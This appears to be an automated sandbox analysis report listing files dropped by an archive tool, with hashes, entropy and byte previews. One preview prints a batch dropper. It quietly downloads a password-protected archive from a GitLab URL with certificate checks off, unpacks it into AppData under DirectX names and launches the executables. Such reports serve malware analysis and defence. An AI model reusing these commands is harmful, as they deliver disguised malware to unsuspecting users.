                Preview:@echo off..echo: & >nul timeout /t 60 /nobreak..start /wait /min %AppData%\DirectX\wget.exe -q --no-check-certificate "https://gitlab.com/michal63roberts63/soft/-/raw/main/DirectXbin.rar" -P %AppData%\DirectX..echo: & >nul timeout /t 5 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectXbin.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 4 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectX.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 4 /nobreak..start /min %AppData%\DirectX\DirectX.exe..echo: & >nul timeout /t 9 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectX32.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 5 /nobreak..start /min %AppData%\DirectX\DirectX32.exe..echo: & >nul timeout /t 9 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectX64.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 5 /nobreak..start /min %AppDa
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2230488
                Entropy (8bit):6.949430593758372
                Encrypted:false
                SSDEEP:49152:2oJAPtSHWxwJWzkDVkwg5NYUzNjteyUHBdH3y005:2ZAHWSxkfNNte9BpCN
                MD5:F59F4F7BEA12DD7C8D44F0A717C21C8E
                SHA1:17629CCB3BD555B72A4432876145707613100B3E
                SHA-256:F150B01C1CBC540C880DC00D812BCCA1A8ABE1166233227D621408F3E75B57D4
                SHA-512:44811F9A5F2917CCD56A7F894157FA305B749CA04903EEAECA493864742E459E0CE640C01C804C266283CE8C3E147C8E6B6CFD6C5CB717E2A374E92C32A63B2C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........F@.n(..n(..n(.d....n(.d...Dn(.d....n(.N....n(..0+..n(..0-..n(..0,..n(......n(......n(..n)..o(.G0-.Gn(.B0...n(.G0*..n(.Rich.n(.........................PE..L...S..\.....................x.......a.......@....@...........................+......O"...@.................................,...,.... ..P.............!..4....+.0...0;..T....................;.......;..@............@.. ............................text....-.......................... ..`.rdata.......@.......2..............@..@.data...$........F..................@....gfids..............................@..@.tls................................@....rsrc...P.... ......................@..@.reloc..0.....+....... .............@..B................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):5.264008326023519
                Encrypted:false
                SSDEEP:96:e+AxPNuB+AHpcuXAqVA709t+AU0ps+570pX6r:eDZNuBDH+uXAqe709tDU0yK70gr
                MD5:15153B92ED05A364F05C12401AFA816C
                SHA1:E357F2EFFFFF14F6F424ABC637FE71D6F41D8D7E
                SHA-256:F759F15B8F7C96EEE41BF4972E45CF48EAA3C2B7B029FB2282DA29EA9718A90D
                SHA-512:AB63C440FDD9F8EB29C3FDECA9A85AD018F5A70290160C414C81642D70BEBF40C5D225875811BFB5A8B3CB7631B22E1CFBE4A712DBE1516AC3F4BDE2F7EE3A9F
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 2%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R.......R...P...R.Rich..R.........PE..L....B.^...........!.........................................................0............@.......................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.............B.^........@...8...8........B.^....................GCTL....8....rdata..8...T....rdata$zzzdbg.... .......rsrc$01....................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):373344
                Entropy (8bit):6.333392087338908
                Encrypted:false
                SSDEEP:6144:+pS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYql6wrEJWPYg:+p8KLBzQ7Lcf3SiQs2FTTql9unNrkv75
                MD5:E5C00B0BC45281666AFD14EEF04252B2
                SHA1:3B6EECF8250E88169976A5F866D15C60EE66B758
                SHA-256:542E2EBBDED3EF0C43551FB56CE44D4DBB36A507C2A801C0815C79D9F5E0F903
                SHA-512:2BACD4E1C584565DFD5E06E492B0122860BFC3B0CC1543E6BADED490535309834E0D5BB760F65DBFB19A9BB0BEDDB27A216C605BBED828810A480C8CD1FBA387
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...$..$..$...'..$...!.:.$.>E...$.X. ..$.X.'..$.X.!..$... ..$...%..$..%.e.$...-..$......$...&..$.Rich..$.................PE..L...'.Gb.................t........................@.......................................@.................................,...........\...............`&.......,..8\..8...................(]......p\..@............................................text...ns.......t.................. ..`.rdata..X............x..............@..@.data...T3..........................@....rsrc...\...........................@..@.reloc...,...........^..............@..B................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:exported SGML document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1153
                Entropy (8bit):5.91838239742257
                Encrypted:false
                SSDEEP:24:OKdAlBAiEHlA/nZakkbH50VF4/PtJyr7ycFSRVUsJuZ6:OKdiBvKmndkb0F494haUsJu8
                MD5:4526C40DCAE0FDC61336987C860F92B0
                SHA1:76A8705C35FA5BFFEDE5DB3D13D68EC74A043D46
                SHA-256:CD876C04E8D610C576448ACBE03A89358D36B3F7B4F8131D1272F97D00243381
                SHA-512:9474EDE599B1C59369E3E7F7E3CCFCC8E3D9AA1432ADA0E6CD7EB4DC7024FFCDA074611EE5C2F200AFDE61B3B3FDE5191D30EF38F949B7BF3C1A187B750ABFD9
                Malicious:false
                Reputation:low
                Preview:<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">..<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">..<security>..<requestedPrivileges>..<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>..</requestedPrivileges>..</security>..</trustInfo>..</assembly>.. BEGIN_VBSEDIT_DATA..PHJvb3Q+DQo8dGltZW91dD4wPC90aW1lb3V0Pg0KPHNjcmlwdG5hbWU+c2V0dXA2..NC52YnM8L3NjcmlwdG5hbWU+DQo8YXBwbmFtZT5TZXR1cDY0PC9hcHBuYW1lPg0K..PHNjcmlwdC8+DQo8bmVlZERMTD50cnVlPC9uZWVkRExMPg0KPHBpZD5FUzczYnZ2..c3VudmQ2YmdMMEJKMG5pSU9VbFJRc1FWQVZkYkNHZ3owUXloOFVCVFBiUkR2NFM1..Q1FqcWhGSUsyPC9waWQ+DQo8ZXZhbHVhdGlvbj4wMjhlMjZhZGUzNWRmYjMxMTFh..MzE5MjdlYWEwNzRjY2E5NmFlYjZlOTNhODU5NDQwNTI5YmQ5ODE5MGM1MDUzNDE0..MzliYzViOWE1YjQyZWJiZmUxM2YxMjJmNjFkNjYxY2E4MzQyYmMxYjZmY2M0MTBk..OTc4YmUzMjNhNDAwMzEyNDM0ZDVkYzhmNmM1NTlkMzlhOWExNjkxYzZiYjE3NjJh..YzY3ZjU0MDUwNDU4ZGViNGRkYWEwMTc3Zjk0MWRmODc5YzRiODI3MWU1ZWJiNmIx..M2E5NzgyYTFmNDI1ZTIxNTU2NTU0NTJkNDM1ZmVhYTQ0YzcyOTc4MmY1ZmE2OGRj..
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):5128016
                Entropy (8bit):6.457617607357032
                Encrypted:false
                SSDEEP:98304:bHObnQdOb3OWEqNHeHq6PdOnS8SOGdVilQeHPpXF0aGOVxuGqYE6hpAl/70pzd+Z:bHInQ5WE2HeHq61OJSOGdVilQeHPpXFA
                MD5:8C04808E4BA12CB793CF661FBBF6C2A0
                SHA1:BDFDB50C5F251628C332042F85E8DD8CF5F650E3
                SHA-256:A7B656FB7A45F8980784B90B40F4A14D035B9DC15616465A341043736EC53272
                SHA-512:9619F96C3180EF3D738ECC1F5DF7508C3FF8904021065665C8388A484648E135105E1C1585DE1577C8B158F9B5BC241E3FF7F92665E9553E846E1B750DDEA20F
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........M............#.`4...M..............p4...@.......................... O.......N....... ...............................N.X*..................H.N..'....................................E.......................N.8............................text....V4......`4.................`..`.data........p4......p4.............@.`..rdata...Q....5..R....5.............@.p@/4......tG...pF..H...`F.............@.0@.bss..........M.......................`..idata..X*....N..,....M.............@.0..CRT....4.....N.......M.............@.0..tls..........O.......M.............@.0./14...........O.......M.............@.0B........................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):3954688
                Entropy (8bit):3.564574141005755
                Encrypted:false
                SSDEEP:24576:Gg4mEzEzlXel6Kqn9DSuGOMAYd1EmH07YV1GmP0jYX1JmX0UY/1ImD0A:G
                MD5:F2C348C5AAFF0C420F4DCE3ABC1BBAD6
                SHA1:873F96BF5F180D786445AB2A129140905D5066B8
                SHA-256:0523A77867D37AC0FD0A9CCC5E6D11882E743ED6D52558F6BB63D5889B7F4AE1
                SHA-512:857A08F0D22B1A3CC9517D632D151BBDD703EC6DD541C84190F305A43F4F81770860AD4C9CC2BAAF149740EAC8D8579DBB2EE7C0E63A0403D061ADB0AE0B0B66
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.:./ni./ni./ni..i./ni..i./ni.W.i./ni.}.i./ni./oi./ni..i./ni..i./ni..i./niRich./ni........................PE..d.....LU.........." .....x....:...............................................<......&=...@.........................................@.;.z.....;.<.....<......`<...............<. .......................................................`............................text...2w.......x.................. ..`.rdata...w:......x:..|..............@..@.data....O....<..,....;.............@....pdata.......`<...... <.............@..@text..........<......4<.............@.. .rsrc.........<......<<.............@..@.reloc..H.....<......><.............@..B........................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):8660480
                Entropy (8bit):3.7338758322023953
                Encrypted:false
                SSDEEP:49152:pkWlBfZEnFqR+hBZBNnyJG7XITT3jtDvN:V+/7XMvN
                MD5:121044FE4AE47114DFCCD15E399DF399
                SHA1:FFF4527981D873E558FD09BD493E97A308D179A4
                SHA-256:112A793D76A840A4BF0E5EA71C9A938A78E67B1514E5BFE856627913B622F156
                SHA-512:A6E114BA6DFF10DA16B3AE8F3A2F4E065D4CAA0DC63D6BE4E292CFE9BEED175E51B82A7B4C2BD413AA9621D341E4CEAE28E414FA5C7D4AD8D162400D8C943BA4
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..jr..jr..jr...r..jr...r..jr...r..jr...r..jr..kr.jr...r..jr...r..jr...r..jr...r..jrRich..jr................PE..d......T.........." .....n...pr...........................................................@.........................................p.......(...d....0|.p.....{.87...........@|......................................................................................text....m.......n.................. ..`.rdata...4.......6...r..............@..@.data..../f......te.................@....pdata..87....{..8....{.............@..@.rsrc...p....0|......T{.............@..@.reloc.......@|......X{.............@..B................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39936
                Entropy (8bit):5.682659983466061
                Encrypted:false
                SSDEEP:768:QQZRtQ/KBET2tQ2vUQGvoYKFLvZuAQMgei3PPBhZnaiPUIZOlu/VesxlL7r:QQZRtRCeQaUKFLvY/hOlQhr
                MD5:30260BE3F0EF942E7616935471CA5374
                SHA1:437361676F0228459E770C578A00D823F05D9B41
                SHA-256:9C8B8400D0F875AC4AD1D60085C89E4827FA07B5C835818B49CBDA9F749DAE5E
                SHA-512:201D9A7438441DBD7DB52596C591A652D6D0000F2382C5DB6E22B02FBFE59C3BDB2A162D4A268972F51650DF2314C010E00B62292AF3102D89B992FAC9F14B34
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\B.H=,.H=,.H=,.AE..J=,.'K..J=,..s..I=,.'K..I=,.'K..A=,.'K..L=,.S...K=,.H=-..=,.S...K=,.S...I=,.S...I=,.S...I=,.RichH=,.................PE..d.....X.........." .....8...`.......=..............................................T=....@.........................................p........o..P...............t...............(....T...............................................P...............................text....7.......8.................. ..`.rdata...K...P...L...<..............@..@.data...............................@....pdata..t...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):25600
                Entropy (8bit):5.5767989133204425
                Encrypted:false
                SSDEEP:384:PhoUaIUSI1PJQKmJDQk8GKjEXVa33SuQvvpCSWYyAIFDOlk6SX:Jha/SIpJQKwQ/jqVi0kSWPFDOli
                MD5:9A0FCD773CFB952A7A76CB56081C7242
                SHA1:2014B923467FA0D8756E40E272ADE88C2E47FFD3
                SHA-256:9D044A088E9808016538E11951BF15C7B6ADCA27A00BC47C4298890B4E5D2A22
                SHA-512:A83D66A48A2195C8A55CA2B2FE8FC08B5029EC57D4001C0AB395D4C8ED8DE8475960F1F5D9E6712DC005C65DC671BC4A38F575D914E90F38E52D804B37D850E2
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.......s.O.....s.......s.......s.......s..U....s...r...s..U....s..U....s..U....s..U....s.Rich..s.........................PE..d...}..X.........." .....,...4.......1..............................................T.....@..........................................^.......Q..P...............l...............L...`B...............................................@..0............................text....*.......,.................. ..`.rdata...$...@...&...0..............@..@.data...X....p.......V..............@....pdata..l............X..............@..@.rsrc................\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):38400
                Entropy (8bit):5.648390778463724
                Encrypted:false
                SSDEEP:768:wQ7Yd2EYIyBhlY62vIwIwOh4qqrh3VOluGtyZd:wQ8dPj62vIw9OoOlPyZ
                MD5:AA1E3C50A0976CC3297B1DC1C229E0FB
                SHA1:55F475AB89235AF8D589364F4E4A03A0FDB5C072
                SHA-256:C81194DDDA474B3B6A9375680461BD4A88854C92F17C3DF884728111D785ECED
                SHA-512:E1D34BBC6168C8BBAC9BE264DFCBFFA192C0E78A0C0618D06C009035415A3BB1DF110FFE00E1CF94704827FA5265FE227CA11EFFDA67795DC4180389492E38A1
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.....k...k...k.......k.s.....k.......k.s.....k.s.....k.s.....k..T....k...j.j.k..T....k..T....k..T....k..T....k.Rich..k.........PE..d......X.........." .....8...Z.......;...............................................\....@.................................................,p..P...............h....................S...............................................P...............................text....7.......8.................. ..`.rdata...E...P...F...<..............@..@.data...p...........................@....pdata..h...........................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):24064
                Entropy (8bit):5.512273805936711
                Encrypted:false
                SSDEEP:384:Y73igMBoAXxOpiXtdbLLpqtHjybiVoOlk6xvlRH:YOxOpmLEjybi6Ol5lB
                MD5:FEE62389D41DE857A366517B42CB6F29
                SHA1:635B97CBA8CFF5377A08607DFCCFD590075D1B2E
                SHA-256:32656A3F9248BA7520205F291E389FFC9920342C813865C7FA60CEF2389613E2
                SHA-512:4E55BA7C0399DD480256D958E554D6E8609D54FA8E5B71749272B537CC45C68E9E31D124F142CFF5A33F05EFFB78092F334D41D87390FDD277C3C5F72F86F3B2
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vr...............kf.....}ei......]m.....}ek.....}e_.....}e^.......i...............Z.......n.......h.....Rich....................PE..d....E.X.........." .....&...4.......,..............................................!.....@..........................................\..b...4R..P...............................d....B...............................................@...............................text....%.......&.................. ..`.rdata..r&...@...(...*..............@..@.data...H....p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):40064
                Entropy (8bit):6.274421390655552
                Encrypted:false
                SSDEEP:768:6oHeyyllSkorBjtgStOHOHK/r2SQ4OpGgrOcQZfpG3whp/:6UeySlSH7dKvQ4OpGgrOcQBpGghR
                MD5:515F64A6C82173F6AE51F73713C93E63
                SHA1:CBE3210332B57E8BCE0DD808747754E4D3EFB5BA
                SHA-256:1DA18EBC37EFC84313168B3050363E19AF2463EB28AE270349B4A379583E7B23
                SHA-512:6B854C1B343F8E9D92658FC59083911F9D86DFFB437DFB15789930E93FF745C04D343B6411C9F279AD2F696BFF1AC29A013C463E2B656C5B6A8ACAC9008C1BCB
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PO....h...h...h..V....h.a....h..V....h..V....h.3.....h...i.^.h..V....h..V....h..|....h..V....h.Rich..h.................PE..d...B..Q.........." .....>...>.......E....................................................@.........................................Pt......Tm..d.......D.......(...............D....Q...............................................P...............................text....=.......>.................. ..`.rdata...+...P...,...B..............@..@.data...0............n..............@....pdata..(............p..............@..@.rsrc...D............v..............@..@.reloc...............~..............@..B........................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):34944
                Entropy (8bit):5.892574430686721
                Encrypted:false
                SSDEEP:384:Zj17tArbZZb8GoVlPuWawUCfoBSrVgwSoRRi6wwJg2jFoRKSwsjtiGX65JNNzFwf:ZErHoVlPdrVgwrRi6wkljFMfpk3wh5
                MD5:E34FE9F692579294041A185F3C1C0A82
                SHA1:38D9DFC8FE524D44083EB07B3C0FFCB900E598C4
                SHA-256:A16ADF54B70D59F9A9B1BCEE3C296E2588B8FF757F8A68A0747736C163F0EF61
                SHA-512:428A1F99C6DB7F7C4E5C45A606B7241891BFE5A4E2D90D2DA6740CA757873ACA7A98B940D54E4AC90054CB3B85B4997A19A0EA88D7465454298A820584CD3102
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#...#...#...*.*.'.......!.......2.......(.......'....[r. ...#...........!.......".....F."...#..."......."...Rich#...........PE..d......X.........." .....4...:.......2........@........................................... .........................................`d......$e..x....................l..........|....U..T....................V..(...pU...............P...............................text....3.......4.................. ..`.rdata.......P.......8..............@..@.data...h....p.......V..............@....pdata...............Z..............@..@.tls.................`..............@....gfids..<............b..............@..@.rsrc................d..............@..@.reloc..|............j..............@..B................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):3696072
                Entropy (8bit):6.574865903829714
                Encrypted:false
                SSDEEP:49152:nqr33AJsOB8SLXId6mEjWEmNZMKRMbDhQc6555Rqp28ITdGS90tQhveWja37PLE3:nyUa6PcMbWD86dGZR
                MD5:6BC4ADA9A7CAB72F49C564E6C86B4C3E
                SHA1:F0FBA01542A0FBE585106F7EFD884DF65E8C89DC
                SHA-256:7D0D1290382EA0E44A3178446A0C202696237E27DBB5F8F0827691092B8F2228
                SHA-512:D7EC39514C104B40A42CD3CA956BA84F5A78F237A39F40D85BA54983145BCE2DFBC7EC5E0CBC1BF8AB64D1D370371A7CBA5E30202D2C1F37782DB32486ED7F6E
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a..V...V...V...[..o...[..W....h..T..._xi.Y...V........h..X....h..J....h..X....h..W....h.......h..U....h..W....h..W...RichV...........PE..L....=.f...........!......5...........*.......6...............................9.......8...@A..........................5.u...X.6.......7.@............D8..!... 7.p......T...................l..........@.............6.T............................text...%.5.......5................. ..`.data.........6..d....5.............@....idata........6......N6.............@..@.rsrc...@.....7......d6.............@..@.reloc..p.... 7......j6.............@..B................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39936
                Entropy (8bit):5.682659983466061
                Encrypted:false
                SSDEEP:768:QQZRtQ/KBET2tQ2vUQGvoYKFLvZuAQMgei3PPBhZnaiPUIZOlu/VesxlL7r:QQZRtRCeQaUKFLvY/hOlQhr
                MD5:30260BE3F0EF942E7616935471CA5374
                SHA1:437361676F0228459E770C578A00D823F05D9B41
                SHA-256:9C8B8400D0F875AC4AD1D60085C89E4827FA07B5C835818B49CBDA9F749DAE5E
                SHA-512:201D9A7438441DBD7DB52596C591A652D6D0000F2382C5DB6E22B02FBFE59C3BDB2A162D4A268972F51650DF2314C010E00B62292AF3102D89B992FAC9F14B34
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\B.H=,.H=,.H=,.AE..J=,.'K..J=,..s..I=,.'K..I=,.'K..A=,.'K..L=,.S...K=,.H=-..=,.S...K=,.S...I=,.S...I=,.S...I=,.RichH=,.................PE..d.....X.........." .....8...`.......=..............................................T=....@.........................................p........o..P...............t...............(....T...............................................P...............................text....7.......8.................. ..`.rdata...K...P...L...<..............@..@.data...............................@....pdata..t...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):25600
                Entropy (8bit):5.5767989133204425
                Encrypted:false
                SSDEEP:384:PhoUaIUSI1PJQKmJDQk8GKjEXVa33SuQvvpCSWYyAIFDOlk6SX:Jha/SIpJQKwQ/jqVi0kSWPFDOli
                MD5:9A0FCD773CFB952A7A76CB56081C7242
                SHA1:2014B923467FA0D8756E40E272ADE88C2E47FFD3
                SHA-256:9D044A088E9808016538E11951BF15C7B6ADCA27A00BC47C4298890B4E5D2A22
                SHA-512:A83D66A48A2195C8A55CA2B2FE8FC08B5029EC57D4001C0AB395D4C8ED8DE8475960F1F5D9E6712DC005C65DC671BC4A38F575D914E90F38E52D804B37D850E2
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.......s.O.....s.......s.......s.......s..U....s...r...s..U....s..U....s..U....s..U....s.Rich..s.........................PE..d...}..X.........." .....,...4.......1..............................................T.....@..........................................^.......Q..P...............l...............L...`B...............................................@..0............................text....*.......,.................. ..`.rdata...$...@...&...0..............@..@.data...X....p.......V..............@....pdata..l............X..............@..@.rsrc................\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):38400
                Entropy (8bit):5.648390778463724
                Encrypted:false
                SSDEEP:768:wQ7Yd2EYIyBhlY62vIwIwOh4qqrh3VOluGtyZd:wQ8dPj62vIw9OoOlPyZ
                MD5:AA1E3C50A0976CC3297B1DC1C229E0FB
                SHA1:55F475AB89235AF8D589364F4E4A03A0FDB5C072
                SHA-256:C81194DDDA474B3B6A9375680461BD4A88854C92F17C3DF884728111D785ECED
                SHA-512:E1D34BBC6168C8BBAC9BE264DFCBFFA192C0E78A0C0618D06C009035415A3BB1DF110FFE00E1CF94704827FA5265FE227CA11EFFDA67795DC4180389492E38A1
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.....k...k...k.......k.s.....k.......k.s.....k.s.....k.s.....k..T....k...j.j.k..T....k..T....k..T....k..T....k.Rich..k.........PE..d......X.........." .....8...Z.......;...............................................\....@.................................................,p..P...............h....................S...............................................P...............................text....7.......8.................. ..`.rdata...E...P...F...<..............@..@.data...p...........................@....pdata..h...........................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):24064
                Entropy (8bit):5.512273805936711
                Encrypted:false
                SSDEEP:384:Y73igMBoAXxOpiXtdbLLpqtHjybiVoOlk6xvlRH:YOxOpmLEjybi6Ol5lB
                MD5:FEE62389D41DE857A366517B42CB6F29
                SHA1:635B97CBA8CFF5377A08607DFCCFD590075D1B2E
                SHA-256:32656A3F9248BA7520205F291E389FFC9920342C813865C7FA60CEF2389613E2
                SHA-512:4E55BA7C0399DD480256D958E554D6E8609D54FA8E5B71749272B537CC45C68E9E31D124F142CFF5A33F05EFFB78092F334D41D87390FDD277C3C5F72F86F3B2
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vr...............kf.....}ei......]m.....}ek.....}e_.....}e^.......i...............Z.......n.......h.....Rich....................PE..d....E.X.........." .....&...4.......,..............................................!.....@..........................................\..b...4R..P...............................d....B...............................................@...............................text....%.......&.................. ..`.rdata..r&...@...(...*..............@..@.data...H....p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):29824
                Entropy (8bit):6.039838597688421
                Encrypted:false
                SSDEEP:384:n++gVRZmK7X+PouLyd1nRABercwHCajwWriXqyOwaQQRKSwsjtaGx5JNNzFwhhi7:n+90ZGdm2i6AfkfB33whmDT
                MD5:0FDDEC2C94465A6B68BF71A0510B75DA
                SHA1:0D1F7BACABB3A3AA37C227C730349C2B354291B6
                SHA-256:3778715E9997A36F24D7B131033BA00EC79E6957495F87D619679C584AA032AE
                SHA-512:7DE66ABD72A7110C5E6B927D7E2ACF6BA13C8630A4B7A2F669F9336F315448750878428CDEE8EBE3367590FD90203767286EDC1DBF570373A0A9417046AF7F94
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#..^ ...#..^&...#..^'...#..^"...#......#.T^"...#..."...#.T^&...#.T^#...#.Q^...#.......#.T^!...#.Rich..#.........................PE..d.....X.........." .....&...4......x$........@.....................................d..... ..........................................P.......S...............p.......X..........D....C..T...........................PD...............@...............................text....$.......&.................. ..`.rdata.......@.......*..............@..@.data........`.......H..............@....pdata.......p.......J..............@..@.gfids..4............N..............@..@.rsrc................P..............@..@.reloc..D............V..............@..B................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):36992
                Entropy (8bit):5.910722507912451
                Encrypted:false
                SSDEEP:384:W3v2f73zcgLU3BRsUl2sMiMyvf6dkfXLiLF0GfyHw7pRK4RKSwsjtiGt5JNNzFwb:WeMDGzNXyGHNRKcfpj3whh
                MD5:BD8F32EF749328AD76D8B16C6AFDAEE7
                SHA1:F8F3195DD3177182333C137FFEBA941CCE21F996
                SHA-256:D0FBCF7A31E137BDC22CA3561A5694DE36E3FDCC70823EF3B5A4D18BA5AB873E
                SHA-512:BB3B013CCFCDA902B8456103DCE5CDC3D6E8D5060994467FF50A20DC14949517F2EFC2086FBB27774D3E72F6E0A92810C58581D2C813817BAE0C6B0BE1429198
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........')..FG..FG..FG..>..FG...D..FG...B..FG...C..FG...F..FG.2....FG..FF..FG...N..FG...G..FG......FG..F..FG...E..FG.Rich.FG.................PE..d......X.........." .....4...B......`5...................................................`..........................................f.......g..................,....t...............V..p...........................pV...............P..h............................text....3.......4.................. ..`.rdata...$...P...&...8..............@..@.data................^..............@....pdata..,............b..............@..@.gfids..,............h..............@..@.rsrc................j..............@..@.reloc...............r..............@..B................................................................................................................................................................................................
